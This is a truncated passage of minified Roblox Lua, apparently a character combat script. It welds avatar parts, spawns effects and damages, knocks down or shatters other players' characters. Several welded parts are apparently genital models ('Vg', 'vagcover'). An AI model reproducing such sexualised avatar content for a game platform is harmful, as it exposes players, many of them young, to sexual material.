brown")kq.Parent=aA;kq.Scale=Vector3.new(0.899999976,0.400000006,0.899999976)kq.MeshType=Enum.MeshType.Sphere;kr.Name="Torso"kr.Parent=aA;kr.C0=CFrame.new(1.00810242,0.00668120384,-0.0114426017,5.99958003e-06,0.999901295,0.0141194807,-0.999941111,0.000160070136,-0.0109077049,-0.0109090386,-0.0141187282,0.999840915)kr.Part0=aA;kr.Part1=Torso;kr.part1=Torso;Part4.Name="Vg"Part4.Parent=Model0;Part4.CFrame=CFrame.new(-0.866321027,5.57360649,1.57845628,0.00160500058,-0.0125150038,0.999920428,0.999988377,-0.00454756292,-0.00166202663,0.00456800172,0.999911368,0.0125075588)Part4.Orientation=Vector3.new(0.100000001,89.2799988,90.2600021)Part4.Position=Vector3.new(-0.866321027,5.57360649,1.57845628)Part4.Rotation=Vector3.new(7.57000017,89.2799988,82.6900024)Part4.Color=Color3.new(0.854902,0.52549,0.478431)Part4.Size=Vector3.new(0.900895953,1.80179191,0.900895953)Part4.Anchored=false;Part4.BottomSurface=Enum.SurfaceType.Smooth;Part4.BrickColor=BrickColor.new("Medium red")Part4.CanCollide=false;Part4.Material=Enum.Material.SmoothPlastic;Part4.TopSurface=Enum.SurfaceType.Smooth;Part4.brickColor=BrickColor.new("Medium red")ks.Parent=Part4;ks.Scale=Vector3.new(0.910000026,0.300000012,0.910000026)ks.MeshType=Enum.MeshType.Sphere;kt.Name="mainskin"kt.Parent=Part4;kt.C0=CFrame.new(0,0,0,1.00000024,4.65661287e-10,1.23691279e-10,4.65661287e-10,1,9.31322575e-10,1.23691279e-10,9.31322575e-10,1)kt.Part0=Part4;kt.Part1=aA;kt.part1=aA;ku.Name="Vg2"ku.Parent=Model0;ku.CFrame=CFrame.new(-0.865878761,5.55604744,1.57808244,0.00160500058,-0.0125150038,0.999920428,0.999988377,-0.00454756292,-0.00166202663,0.00456800172,0.999911368,0.0125075588)ku.Orientation=Vector3.new(0.100000001,89.2799988,90.2600021)ku.Position=Vector3.new(-0.865878761,5.55604744,1.57808244)ku.Rotation=Vector3.new(7.57000017,89.2799988,82.6900024)ku.Color=Color3.new(0.639216,0.294118,0.294118)ku.Size=Vector3.new(0.900895953,0.900895953,0.900895953)ku.Anchored=false;ku.BottomSurface=Enum.SurfaceType.Smooth;ku.BrickColor=BrickColor.new("Dusty Rose")ku.CanCollide=false;ku.Material=Enum.Material.SmoothPlastic;ku.TopSurface=Enum.SurfaceType.Smooth;ku.brickColor=BrickColor.new("Dusty Rose")kv.Parent=ku;kv.Scale=Vector3.new(0.910000026,0.300000012,0.910000026)kv.MeshType=Enum.MeshType.Sphere;kw.Name="mainskin"kw.Parent=ku;kw.C0=CFrame.new(0.0175599698,0.000299525098,-0.00046673941,1.00000024,4.65661287e-10,1.23691279e-10,4.65661287e-10,1,9.31322575e-10,1.23691279e-10,9.31322575e-10,1)kw.Part0=ku;kw.Part1=aA;kw.part1=aA;kx.Name="Skin"kx.Parent=Model0;kx.CFrame=CFrame.new(-0.776254952,5.58247375,1.58018422,-0.572227836,-0.0160920434,0.819936872,0.820094705,-0.0112283546,0.572117686,0,0.999807537,0.0196221787)kx.Orientation=Vector3.new(-34.9000015,88.6299973,90.7799988)kx.Position=Vector3.new(-0.776254952,5.58247375,1.58018422)kx.Rotation=Vector3.new(-88.0400009,55.0800018,178.389999)kx.Color=Color3.new(1,0.8,0.6)kx.Size=Vector3.new(0.891887307,1.49548769,0.900895953)kx.Anchored=false;kx.BottomSurface=Enum.SurfaceType.Smooth;kx.BrickColor=BrickColor.new("Pastel brown")kx.CanCollide=false;kx.Material=Enum.Material.SmoothPlastic;kx.TopSurface=Enum.SurfaceType.Smooth;kx.brickColor=BrickColor.new("Pastel brown")ky.Parent=kx;ky.Scale=Vector3.new(0.899999976,0.400000006,0.899999976)ky.MeshType=Enum.MeshType.Sphere;kz.Name="mainskin"kz.Parent=kx;kz.C0=CFrame.new(0.0442657135,-0.000178598173,-0.0789558589,0.81916672,0.00343200099,-0.573545337,-0.00668692915,0.99997133,-0.00356695056,0.573516667,0.00675718486,0.819166183)kz.Part0=kx;kz.Part1=aA;kz.part1=aA;kp.Name="vagcover"kp.Parent=Torso;kp.PrimaryPart=kA;kA.Name="mainskin"kA.Parent=kp;kA.CFrame=CFrame.new(-0.866962552,5.56903839,1.57845902,0.00160500058,-0.0125150038,0.999920428,0.999988377,-0.00454756292,-0.00166202663,0.00456800172,0.999911368,0.0125075588)kA.Orientation=Vector3.new(0.100000001,89.2799988,90.2600021)kA.Position=Vector3.new(-0.866962552,5.56903839,1.57845902)kA.Rotation=Vector3.new(7.57000017,89.2799988,82.6900024)kA.Color=Color3.new(0.0666667,0.0666667,0.0666667)kA.Size=Vector3.new(0.90731889,1.81463778,0.90731889)kA.Anchored=false;kA.BottomSurface=Enum.SurfaceType.Smooth;kA.BrickColor=BrickColor.new("Really black")kA.CanCollide=false;kA.Material=Enum.Material.SmoothPlastic;kA.TopSurface=Enum.SurfaceType.Smooth;kA.brickColor=BrickColor.new("Really black")kB.Parent=kA;kB.Scale=Vector3.new(0.899999976,0.400000006,0.899999976)kB.MeshType=Enum.MeshType.Sphere;kC.Name="Torso"kC.Parent=kA;kC.C0=CFrame.new(1.01267099,0.00664961338,-0.0108087659,6.00004569e-06,0.999901056,0.0141194789,-0.999941051,0.000160070136,-0.0109077059,-0.0109090377,-0.0141187273,0.999840915)kC.Part0=kA;kC.Part1=Torso;kC.part1=Torso;Part17.Name="Vg"Part17.Parent=kp;Part17.CFrame=CFrame.new(-0.866962552,5.56903839,1.57845902,0.00160500058,-0.0125150038,0.999920428,0.999988377,-0.00454756292,-0.00166202663,0.00456800172,0.999911368,0.0125075588)Part17.Orientation=Vector3.new(0.100000001,89.2799988,90.2600021)Part17.Position=Vector3.new(-0.866962552,5.56903839,1.57845902)Part17.Rotation=Vector3.new(7.57000017,89.2799988,82.6900024)Part17.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part17.Size=Vector3.new(0.90731889,1.81463778,0.90731889)Part17.Anchored=false;Part17.BottomSurface=Enum.SurfaceType.Smooth;Part17.BrickColor=BrickColor.new("Really black")Part17.CanCollide=false;Part17.Material=Enum.Material.SmoothPlastic;Part17.TopSurface=Enum.SurfaceType.Smooth;Part17.brickColor=BrickColor.new("Really black")kD.Parent=Part17;kD.Scale=Vector3.new(0.910000026,0.300000012,0.910000026)kD.MeshType=Enum.MeshType.Sphere;kE.Name="mainskin"kE.Parent=Part17;kE.C0=CFrame.new(0,0,0,1.00000024,4.65661287e-10,1.23691279e-10,4.65661287e-10,1,9.31322575e-10,1.23691279e-10,9.31322575e-10,1)kE.Part0=Part17;kE.Part1=kA;kE.part1=kA;Part20.Name="Vg2"Part20.Parent=kp;Part20.CFrame=CFrame.new(-0.86652112,5.55135584,1.57807875,0.00160500058,-0.0125150038,0.999920428,0.999988377,-0.00454756292,-0.00166202663,0.00456800172,0.999911368,0.0125075588)Part20.Orientation=Vector3.new(0.100000001,89.2799988,90.2600021)Part20.Position=Vector3.new(-0.86652112,5.55135584,1.57807875)Part20.Rotation=Vector3.new(7.57000017,89.2799988,82.6900024)Part20.Color=Color3.new(0.0666667,0.0666667,0.0666667)Part20.Size=Vector3.new(0.90731889,0.90731889,0.90731889)Part20.Anchored=false;Part20.BottomSurface=Enum.SurfaceType.Smooth;Part20.BrickColor=BrickColor.new("Really black")Part20.CanCollide=false;Part20.Material=Enum.Material.SmoothPlastic;Part20.TopSurface=Enum.SurfaceType.Smooth;Part20.brickColor=BrickColor.new("Really black")kF.Parent=Part20;kF.Scale=Vector3.new(0.910000026,0.300000012,0.910000026)kF.MeshType=Enum.MeshType.Sphere;kG.Name="mainskin"kG.Parent=Part20;kG.C0=CFrame.new(0.0176836904,0.00030521708,-0.000466041354,1.00000024,4.65661287e-10,1.23691279e-10,4.65661287e-10,1,9.31322575e-10,1.23691279e-10,9.31322575e-10,1)kG.Part0=Part20;kG.Part1=kA;kG.part1=kA;kH.Name="Skin"kH.Parent=kp;kH.CFrame=CFrame.new(-0.776253998,5.57796907,1.58019507,-0.572227836,-0.0160920434,0.819936872,0.820094705,-0.0112283546,0.572117686,0,0.999807537,0.0196221787)kH.Orientation=Vector3.new(-34.9000015,88.6299973,90.7799988)kH.Position=Vector3.new(-0.776253998,5.57796907,1.58019507)kH.Rotation=Vector3.new(-88.0400009,55.0800018,178.389999)kH.Color=Color3.new(0.0666667,0.0666667,0.0666667)kH.Size=Vector3.new(0.898245931,1.50614965,0.90731889)kH.Anchored=false;kH.BottomSurface=Enum.SurfaceType.Smooth;kH.BrickColor=BrickColor.new("Really black")kH.CanCollide=false;kH.Material=Enum.Material.SmoothPlastic;kH.TopSurface=Enum.SurfaceType.Smooth;kH.brickColor=BrickColor.new("Really black")kI.Parent=kH;kI.Scale=Vector3.new(0.899999976,0.400000006,0.899999976)kI.MeshType=Enum.MeshType.Sphere;kJ.Name="mainskin"kJ.Parent=kH;kJ.C0=CFrame.new(0.0445814133,-0.000175714493,-0.0795190334,0.81916672,0.00343200099,-0.573545337,-0.00668692915,0.99997133,-0.00356695056,0.573516667,0.00675718486,0.819166183)kJ.Part0=kH;kJ.Part1=kA;kJ.part1=kA;v.Parent=eL.Parent;local eN=weld(v,eL.Parent,v,CF())eN.C0=CF(eL.Position)*ANGLES(mr(eL.Orientation.x),mr(eL.Orientation.y),mr(eL.Orientation.z))eN.C1=CF(eK.Position)*ANGLES(mr(eK.Orientation.x),mr(eK.Orientation.y),mr(eK.Orientation.z))end end end))function Swait(eO)if eO==0 or eO==nil then game:GetService("RunService").Heartbeat:wait()game:GetService("RunService").Heartbeat:wait()else for T=1,eO do game:GetService("RunService").Heartbeat:wait()game:GetService("RunService").Heartbeat:wait()end end end;so=function(eq,par,er,pit)CFuncs.Sound.Create(eq,par,er,pit)end;function weld(eP,eQ,eR,dH)local weld=it("Weld")weld.Parent=eP;weld.Part0=eQ;weld.Part1=eR;weld.C0=dH;return weld end;rayCast=function(eS,eT,eU,eV)return game:service("Workspace"):FindPartOnRay(Ray.new(eS,eT.unit*(eU or 999.999)),eV)end;function SetTween(eW,eX,eY,eZ,e_)local f0=Enum.EasingStyle[eY]local f1=Enum.EasingDirection[eZ]local f2=1;if dS==true and mememode==true then f2=5 end;if eW.Name=="Bullet"then f2=1 end;local f3=TweenInfo.new(e_/f2,f0,f1,0,false,0)local f4=eX;local f5=TweenService:Create(eW,f3,f4)f5:Play()end;function GatherAllInstances(ed,f6)local f7={}local eV=nil;if f6~=nil then eV=f6 end;local function f8(ed,eV)for T,v in pairs(ed:GetChildren())do if v~=eV then f8(v,eV)table.insert(f7,v)end end end;f8(ed,eV)return f7 end;function weld(eP,eQ,eR,dH)local weld=it("Weld")weld.Parent=eP;weld.Part0=eQ;weld.Part1=eR;weld.C0=dH;return weld end;function joint(eP,eQ,eR,dH)local weld=it("Motor6D")weld.Parent=eP;weld.Part0=eQ;weld.Part1=eR;weld.C0=dH;return weld end;ArmorParts={}function WeldAllTo(aA,Part2,scan,f9)local fa=Part2.CFrame*f9;for T,v3 in pairs(scan:GetDescendants())do if v3:isA("BasePart")then local fb=weld(v3,v3,aA,fa:toObjectSpace(v3.CFrame):inverse())v3.Anchored=false;v3.Massless=true;v3.CanCollide=false;v3.Parent=aA;v3.Locked=true;if not v3:FindFirstChild("Destroy")then table.insert(ArmorParts,{Part=v3,Par=v3.Parent,Col=v3.Color,Mat=v3.Material.Name})else v3:Destroy()end end end;aA.Transparency=1 end;function JointAllTo(aA,Part2,scan,f9)local fa=Part2.CFrame*f9;for T,v3 in pairs(scan:GetDescendants())do if v3:isA("BasePart")then local fb=joint(v3,v3,aA,fa:toObjectSpace(v3.CFrame):inverse())v3.Anchored=false;v3.Massless=true;v3.CanCollide=false;v3.Parent=aA;v3.Locked=true;if not v3:FindFirstChild("Destroy")then else v3:Destroy()end end end;aA.Transparency=1 end;local kK=EffectPack.Part:Clone()kK.Parent=Character;kK.Name="RightClaw"RCW=weld(RightArm,RightArm,kK,cf(0,0,0))local kL=EffectPack.Part:Clone()kL.Parent=Character;kL.Name="LeftClaw"LCW=weld(LeftArm,LeftArm,kL,cf(0,0,0))local kM=EffectPack.Part:Clone()kM.Parent=Character.Torso;kM.Name="Tail"taew=weld(Torso,Torso,Tail,cf(0,0,0))taew.Parent=kM;tailw=Torso:WaitForChild("Tail").Weld;tailc0=tailw.C0;for U,v in pairs(Character.Armor:children())do if v:IsA("Model")then if Character:FindFirstChild(""..v.Name)then local aA=Character:FindFirstChild(""..v.Name)local Part2=v.Handle;WeldAllTo(aA,Part2,v,CFrame.new(0,0,0))end end end;local kN=Character.LArmYes.LeftArm:WaitForChild'REF'for T,v in pairs(Character.LArmYes.LeftArm:GetChildren())do v.Anchored=false end;local kO=IT("Weld")kO.Parent=LeftArm;kO.Part0=LeftArm;kO.Part1=kN;kO.C1=CF(0,0,0)*angles(0,0,0)local kP=Character.RArmYes.RightArm:WaitForChild'REF'for T,v in pairs(Character.RArmYes.RightArm:GetChildren())do v.Anchored=false end;local kQ=IT("Weld")kQ.Parent=RightArm;kQ.Part0=RightArm;kQ.Part1=kP;kQ.C1=CF(0,0,0)*angles(0,0,0)local kR=Character.TorsoYes.Torso:WaitForChild'REF'for T,v in pairs(Character.TorsoYes.Torso:GetChildren())do v.Anchored=false end;local kO=IT("Weld")kO.Parent=Torso;kO.Part0=Torso;kO.Part1=kR;kO.C1=CF(0,0,0)*angles(0,RAD(0),0)local kS=Character.LLegYes.LeftLeg:WaitForChild'REF'for T,v in pairs(Character.LLegYes.LeftLeg:GetChildren())do v.Anchored=false end;local kT=IT("Weld")kT.Parent=LeftLeg;kT.Part0=LeftLeg;kT.Part1=kS;kT.C1=CF(0,0,0)*angles(0,102.1,0)local kU=Character.RLegYes.RightLeg:WaitForChild'REF'for T,v in pairs(Character.RLegYes.RightLeg:GetChildren())do v.Anchored=false end;local kV=IT("Weld")kV.Parent=RightLeg;kV.Part0=RightLeg;kV.Part1=kU;kV.C1=CF(0,0,0)*angles(0,-102.1,0)local fc=Create("Texture")({Texture="http://www.roblox.com/asset/?id=1693385655",Color3=Color3.new(163/255,162/255,165/255)})function AddStoneTexture(ec)coroutine.resume(coroutine.create(function()for T=0,6,1 do local fd=fc:Clone()fd.Face=T;fd.Parent=ec end end))end;New=function(j,ed,ei,fe)local j=Instance.new(j)for ff,fg in pairs(fe or{})do j[ff]=fg end;j.Parent=ed;j.Name=ei;return j end;function Tran(fh)local fi=""if fh=="1"then fi="a"elseif fh=="2"then fi="b"elseif fh=="3"then fi="c"elseif fh=="4"then fi="d"elseif fh=="5"then fi="e"elseif fh=="6"then fi="f"elseif fh=="7"then fi="g"elseif fh=="8"then fi="h"elseif fh=="9"then fi="i"elseif fh=="10"then fi="j"elseif fh=="11"then fi="k"elseif fh=="12"then fi="l"elseif fh=="13"then fi="m"elseif fh=="14"then fi="n"elseif fh=="15"then fi="o"elseif fh=="16"then fi="p"elseif fh=="17"then fi="q"elseif fh=="18"then fi="r"elseif fh=="19"then fi="s"elseif fh=="20"then fi="t"elseif fh=="21"then fi="u"elseif fh=="22"then fi="v"elseif fh=="23"then fi="w"elseif fh=="24"then fi="x"elseif fh=="25"then fi="y"elseif fh=="26"then fi="z"elseif fh=="27"then fi="_"elseif fh=="28"then fi="0"elseif fh=="29"then fi="1"elseif fh=="30"then fi="2"elseif fh=="31"then fi="3"elseif fh=="32"then fi="4"elseif fh=="33"then fi="5"elseif fh=="34"then fi="6"elseif fh=="35"then fi="7"elseif fh=="36"then fi="8"elseif fh=="37"then fi="9"end;return fi end;function MaybeOk(fj,f9)local fk=""if fj==1 then local fl=""local fm=f9;local fn=""local fo=0;local fp=0;delay(wait(0),function()for v3=1,#fm do if string.sub(fm,0+v3,v3)==","then local fq=string.sub(fm,fp,v3-1)local fr=Tran(string.sub(fm,fp,v3-1))fo=fo+1;fl=fl..fr;fp=v3+1;fn=""end;fn=string.sub(fm,1,v3)wait()end;fk=fl;for v3=1,#fn do fn=string.sub(fm,-1,v3)end end)elseif fj==2 then print("fat")end;while fk==""do wait()end;return fk end;function CreateMesh2(fs,ft,fu,fv,fw,fx,fy)local fz=IT(fs)if fs=="SpecialMesh"then fz.MeshType=fu;if fv~="nil"and fv~=""then fz.MeshId="http://www.roblox.com/asset/?id="..fv end;if fw~="nil"and fw~=""then fz.TextureId="http://www.roblox.com/asset/?id="..fw end end;fz.Offset=fy or VT(0,0,0)fz.Scale=fx;fz.Parent=ft;return fz end;function CreatePart2(fA,ft,fB,fC,fD,fE,fF,fG,fH)local fI=IT("Part")fI.formFactor=fA;fI.Reflectance=fC;fI.Transparency=fD;fI.CanCollide=false;fI.Locked=true;fI.Anchored=true;if fH==false then fI.Anchored=false end;fI.BrickColor=BRICKC(tostring(fE))fI.Name=fF;fI.Size=fG;fI.Position=Torso.Position;fI.Material=fB;fI:BreakJoints()fI.Parent=ft;return fI end;local dA=IT("Sound")function CreateSound2(fJ,ft,fK,fL,fM)local fN=nil;coroutine.resume(coroutine.create(function()fN=dA:Clone()fN.Parent=ft;fN.Volume=fK;fN.Pitch=fL;fN.SoundId="http://www.roblox.com/asset/?id="..fJ;fN:play()if fM==true then fN.Looped=true else repeat wait(1)until fN.Playing==false;fN:remove()end end))return fN end;function WACKYEFFECT(fO)local fP=fO.EffectType or"Sphere"local fG=fO.Size or VT(1,1,1)local fQ=fO.Size2 or VT(0,0,0)local fD=fO.Transparency or 0;local fR=fO.Transparency2 or 1;local fS=fO.CFrame or Torso.CFrame;local fT=fO.MoveToPos or nil;local fU=fO.RotationX or 0;local fV=fO.RotationY or 0;local fW=fO.RotationZ or 0;local fB=fO.Material or"Neon"local fX=fO.Color or C3(1,1,1)local fY=fO.Time or 45;local fZ=fO.SoundID or nil;local f_=fO.SoundPitch or nil;local g0=fO.SoundVolume or nil;coroutine.resume(coroutine.create(function()local g1=false;local g2=nil;local g3=CreatePart2(3,Effects,fB,0,fD,BRICKC("Pearl"),"Effect",VT(1,1,1),true)if fZ~=nil and f_~=nil and g0~=nil then g1=true;g2=CreateSound2(fZ,g3,g0,f_,false)end;g3.Color=fX;local g4=nil;if fP=="Sphere"then g4=CreateMesh2("SpecialMesh",g3,"Sphere","","",fG,VT(0,0,0))elseif fP=="Cylinder"then g4=CreateMesh2("SpecialMesh",g3,"Cylinder","","",fG,VT(0,0,0))elseif fP=="Block"then g4=IT("BlockMesh",g3)g4.Scale=VT(fG.X,fG.X,fG.X)elseif fP=="Cube"then g4=IT("BlockMesh",g3)g4.Scale=VT(fG.X,fG.X,fG.X)elseif fP=="Wave"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","20329976","",fG,VT(0,0,-fG.X/8))elseif fP=="Ring"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","559831844","",VT(fG.X,fG.X,0.1),VT(0,0,0))elseif fP=="Slash"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","662586858","",VT(fG.X/10,0,fG.X/10),VT(0,0,0))elseif fP=="Round Slash"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","662585058","",VT(fG.X/10,0,fG.X/10),VT(0,0,0))elseif fP=="Swirl"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","1051557","",fG,VT(0,0,0))elseif fP=="Skull"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","4770583","",fG,VT(0,0,0))elseif fP=="Crystal"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","9756362","",fG,VT(0,0,0))elseif fP=="Crown"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","173770780","",fG,VT(0,0,0))end;if g4~=nil then local g5=nil;if fT~=nil then g5=(fS.p-fT).Magnitude/fY end;local g6=fG-fQ;local g7=fD-fR;if fP=="Block"then SetTween(g3,{CFrame=fS*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))},"Linear","InOut",fY/60)else SetTween(g3,{CFrame=fS},"Linear","InOut",0)end;wait()SetTween(g3,{Transparency=g3.Transparency-g7},"Linear","InOut",fY/60)if fP=="Block"then SetTween(g3,{CFrame=fS*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))},"Linear","InOut",0)else SetTween(g3,{CFrame=g3.CFrame*ANGLES(RAD(fU),RAD(fV),RAD(fW))},"Linear","InOut",0)end;if fT~=nil then local g8=g3.Orientation;SetTween(g3,{CFrame=CF(fT)},"Linear","InOut",fY/60)SetTween(g3,{Orientation=g8},"Linear","InOut",fY/60)end;g4.Scale=g4.Scale-g6/fY;SetTween(g4,{Scale=fQ},"Linear","InOut",fY/60)if fP=="Wave"then SetTween(g4,{Offset=VT(0,0,-g4.Scale.X/8)},"Linear","InOut",fY/60)end;for g9=1,fY+1 do wait(.05)if fP=="Block"then else end;if fT~=nil then local g8=g3.Orientation end end;game:GetService("Debris"):AddItem(g3,15)if g1==false then g3:remove()else g2.Stopped:Connect(function()g3:remove()end)end else if g1==false then g3:remove()else repeat wait()until g2.Playing==false;g3:remove()end end end))end;function CreatePart(ed,ee,ef,eg,eh,ei,k)local Part=Create("Part"){Parent=ed,Reflectance=ef,Transparency=eg,CanCollide=false,Locked=true,BrickColor=BrickColor.new(tostring(eh)),Name=ei,Size=k,Material=ee}RemoveOutlines(Part)return Part end;local ga=Create("ParticleEmitter"){Color=ColorSequence.new(Color3.new(1,1,1),Color3.new(170/255,255/255,255/255)),Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(.75,.4),NumberSequenceKeypoint.new(1,1)}),Size=NumberSequence.new({NumberSequenceKeypoint.new(0,.5),NumberSequenceKeypoint.new(1,.0)}),Texture="rbxassetid://241922778",Lifetime=NumberRange.new(0.55,0.95),Rate=100,VelocitySpread=180,Rotation=NumberRange.new(0),RotSpeed=NumberRange.new(-200,200),Speed=NumberRange.new(8.0),LightEmission=1,LockedToPart=false,Acceleration=Vector3.new(0,0,0),EmissionDirection="Top",Drag=4,Enabled=false}local gb=Create("ParticleEmitter"){Color=ColorSequence.new(Color3.new(1,1,1),Color3.new(1,1,1)),Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(0.1,0),NumberSequenceKeypoint.new(0.3,0),NumberSequenceKeypoint.new(0.5,.2),NumberSequenceKeypoint.new(1,1)}),Size=NumberSequence.new({NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(.15,1.5),NumberSequenceKeypoint.new(.75,1.5),NumberSequenceKeypoint.new(1,0)}),Texture="rbxassetid://936193661",Lifetime=NumberRange.new(1.5),Rate=100,VelocitySpread=0,Rotation=NumberRange.new(0),RotSpeed=NumberRange.new(-10,10),Speed=NumberRange.new(0),LightEmission=.25,LockedToPart=true,Acceleration=Vector3.new(0,-0,0),EmissionDirection="Top",Drag=4,ZOffset=1,Enabled=false}Damagefunc=function(Part,hit,gc,gd,ge,gf,gg,Delay,gh,gi)if hit.Parent==nil then return end;local h=hit.Parent:FindFirstChildOfClass("Torso")for U,v in pairs(hit.Parent:children())do if v:IsA("Torso")then if h.Health>0.0001 then h=v else end end end;if h==nil then return elseif h~=nil and h.Health<0.001 then return elseif h~=nil and h.Parent:FindFirstChild("Fly away")then return end;coroutine.resume(coroutine.create(function()if h.Health>9999999 and gc<9999 and gf~="IgnoreType"and(h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso"))and not h.Parent:FindFirstChild("Fly away")then local gj=Instance.new("Model",h.Parent)gj.Name="Fly away"game:GetService("Debris"):AddItem(gj,2.5)for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=true end end;wait(.25)if h.Parent:FindFirstChildOfClass("Body Colors")then h.Parent:FindFirstChildOfClass("Body Colors"):Destroy()end;local gk=h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso")coroutine.resume(coroutine.create(function()local gl=Instance.new("Part")gl.Reflectance=0;gl.Transparency=1;gl.CanCollide=false;gl.Locked=true;gl.Anchored=true;gl.BrickColor=BrickColor.new("Really blue")gl.Name="YourGone"gl.Size=Vector3.new()gl.Material="SmoothPlastic"gl:BreakJoints()gl.Parent=gk;gl.CFrame=gk.CFrame;local gm=Instance.new("ParticleEmitter")gm.Parent=gl;gm.Acceleration=Vector3.new(0,0,0)gm.Size=NumberSequence.new({NumberSequenceKeypoint.new(0,10),NumberSequenceKeypoint.new(1,.0)})gm.Color=ColorSequence.new(Color3.new(1,0,0),Color3.new(1,0,0))gm.Lifetime=NumberRange.new(0.55,0.95)gm.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(.25,.0),NumberSequenceKeypoint.new(1,1)})gm.Speed=NumberRange.new(0,0.0)gm.ZOffset=2;gm.Texture="rbxassetid://243660364"gm.RotSpeed=NumberRange.new(-0,0)gm.Rotation=NumberRange.new(-180,180)gm.Enabled=false;game:GetService("Debris"):AddItem(gl,3)for T=0,2,1 do gm:Emit(1)so("1448044156",gk,2,1)h.Parent:BreakJoints()gl.CFrame=gk.CFrame;for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=false;if v:FindFirstChildOfClass("SpecialMesh")then end;if v:FindFirstChildOfClass("Decal")and v.Name=="face"then end;local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(1000,1000,1000),velocity=Vector3.new(math.random(-10,10),4,math.random(-10,10))})gn.Parent=v;game:GetService("Debris"):AddItem(gn,math.random(50,100)/1000)end end;wait(.2)end;wait(.1)gm:Emit(3)so("1448044156",gk,2,.8)h.Parent:BreakJoints()gl.CFrame=gk.CFrame;for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=false;if v:FindFirstChildOfClass("SpecialMesh")then end;if v:FindFirstChildOfClass("Decal")and v.Name=="face"then end;local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(1000,1000,1000),velocity=Vector3.new(math.random(-10,10),4,math.random(-10,10))})gn.Parent=v;game:GetService("Debris"):AddItem(gn,math.random(100,200)/1000)end end end))wait(.1)end end))if h~=nil and hit.Parent~=Character and hit.Parent:FindFirstChild("Torso")or hit.Parent:FindFirstChild("UpperTorso")~=nil then if hit.Parent:findFirstChild("DebounceHit")~=nil and hit.Parent.DebounceHit.Value==true then return end;local c=Create("ObjectValue")({Name="creator",Value=game:service("Players").LocalPlayer,Parent=h})game:GetService("Debris"):AddItem(c,0.5)if gh~=nil and gi~=nil then so(gh,hit,1,gi)end;local Damage=math.random(gc,gd)local go=false;local gq=hit.Parent:findFirstChild("Block")if gq~=nil and gq.className=="IntValue"and gq.Value>0 then go=true;gq.Value=gq.Value-1;print(gq.Value)end;if go==false then h.Health=h.Health-Damage;ShowDamage(Part.CFrame*CFrame.new(0,0,Part.Size.Z/2).p+Vector3.new(0,1.5,0),-Damage,1.5,Color3.new(0,0,0))else h.Health=h.Health-Damage/2;ShowDamage(Part.CFrame*CFrame.new(0,0,Part.Size.Z/2).p+Vector3.new(0,1.5,0),-Damage,1.5,Color3.new(0,0,0))end;if gf=="Knockdown"then local hum=h;hum.PlatformStand=true;coroutine.resume(coroutine.create(function(gr)wait(.2)gr.PlatformStand=false end),hum)local gk=h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso")local gs=hit.Position-(gg.Position+Vector3.new(0,0,0)).unit;local gt=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=CFrame.new(Part.Position,gk.Position).lookVector*ge,Parent=hit})local gu=Create("BodyAngularVelocity")({P=3000,maxTorque=Vector3.new(5000,5000,5000)*5,angularvelocity=Vector3.new(math.random(-10,10),math.random(-10,10),math.random(-10,10)),Parent=hit})game:GetService("Debris"):AddItem(gt,2)game:GetService("Debris"):AddItem(gu,0.125)elseif gf=="Knockdown2"then local hum=h;hum.PlatformStand=true;coroutine.resume(coroutine.create(function(gr)Combo=1;wait(.2)gr.PlatformStand=false end),hum)local gs=hit.Position-(gg.Position+Vector3.new(0,0,0)).unit;local gt=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=CFrame.new(Part.Position,gg.Position).lookVector*ge})local gu=Create("BodyAngularVelocity")({P=3000,maxTorque=Vector3.new(5000,5000,5000)*50,angularvelocity=Vector3.new(math.random(-10,10),math.random(-10,10),math.random(-10,10)),Parent=hit})game:GetService("Debris"):AddItem(gt,0.2)game:GetService("Debris"):AddItem(gu,0.2)local gv=Create("BodyVelocity")({velocity=Vector3.new(0,60,0),P=5000,maxForce=Vector3.new(8000,12000,8000),Parent=RootPart})game:GetService("Debris"):AddItem(gv,0.1)elseif gf=="Normal"then local gk=h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso")local gs=hit.Position-(gg.Position+Vector3.new(0,0,0)).unit;local gt=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=CFrame.new(Part.Position,gk.Position).lookVector*ge,Parent=hit})game:GetService("Debris"):AddItem(gt,.1)elseif gf=="Fire"then local gw=hit.Parent:FindFirstChild("Torso")or hit.Parent:FindFirstChild("UpperTorso")local kW=0;for U,eM in next,gw:GetChildren()do if eM:IsA("Folder")and eM.Name=="OnFire"then kW=kW+1 end end;if kW<2 then local kX=EffectPack.FireEffect:Clone()local kY=Instance.new("Folder",gw)kY.Name="OnFire"game:GetService("Debris"):AddItem(kY,4.5)for U,v in next,kX:GetDescendants()do if v:IsA("ParticleEmitter")or v:IsA("SpotLight")then 